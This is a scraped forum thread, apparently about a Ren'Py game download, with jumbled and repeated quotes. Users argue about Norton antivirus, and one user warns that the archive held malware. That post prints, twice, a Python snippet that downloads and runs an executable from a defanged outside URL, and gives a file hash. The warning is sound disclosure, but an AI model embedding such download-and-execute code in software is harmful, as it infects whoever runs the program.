Who the hell does use Norton in this century? Are you into masochism?Hmm i get a Virus Warning from Norton in the latest Update .
It says there is a Heur.AdvML.B in the Archive
I got a free License with my new Laptop so why wouldnt i use it ?Who the hell does use Norton in this century? Are you into masochism?
there is malware in at least the files linked from gofile, PillKing-0.21-pc.zip with md5 c47b9707e94d7d5cde67654854920915. it contains python to download and execute malware (i've edited parts of the url):Just wondering about this update and Viruses. On the 'Other' site there was an issue with a virus, and wanted to know if it was in this site's version.
Heck, even if it's clean I'm not sure if I want to continue with this. With all the changes to the story things just feel like it's not worth the time spent. Might wait a few updates and try again before I decide.
Just a thought.
# Download and execute the file
file_url = 'hxxp://gostatts[.]com/game[.]exe'
local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file')
print(f"Attempting to download file from {file_url} to {local_file_path}")
if download_file(file_url, local_file_path):
print(f"Attempting to execute file at {local_file_path}")
run_file(local_file_path)
else:
print("Download failed. File will not be executed.")
I wouldn't install Norton even if they paid me. It's bad, like really bad, and it slows your PC. Just look at opinions from people in IT sector, I bet Norton did not have a good review (apart from the paid ones) in the last 20 years. Just use Windows Defender it's surely better than Norton.I got a free License with my new Laptop so why wouldnt i use it ?
Ty for that confirmationthere is malware in at least the files linked from gofile, PillKing-0.21-pc.zip with md5 c47b9707e94d7d5cde67654854920915. it contains python to download and execute malware (i've edited parts of the url):
Python:# Download and execute the file file_url = 'hxxp://gostatts[.]com/game[.]exe' local_file_path = os.path.join(renpy_base, 'renpy', 'downloaded_file') print(f"Attempting to download file from {file_url} to {local_file_path}") if download_file(file_url, local_file_path): print(f"Attempting to execute file at {local_file_path}") run_file(local_file_path) else: print("Download failed. File will not be executed.")
virustotal also doesn't have great things to say about this:You must be registered to see links
if you downloaded and executed this, i'd start doing some damage control.
edit: mods updated links in OP already so i assume they're clean now.
This site provides links to other sites/services, and does not store any files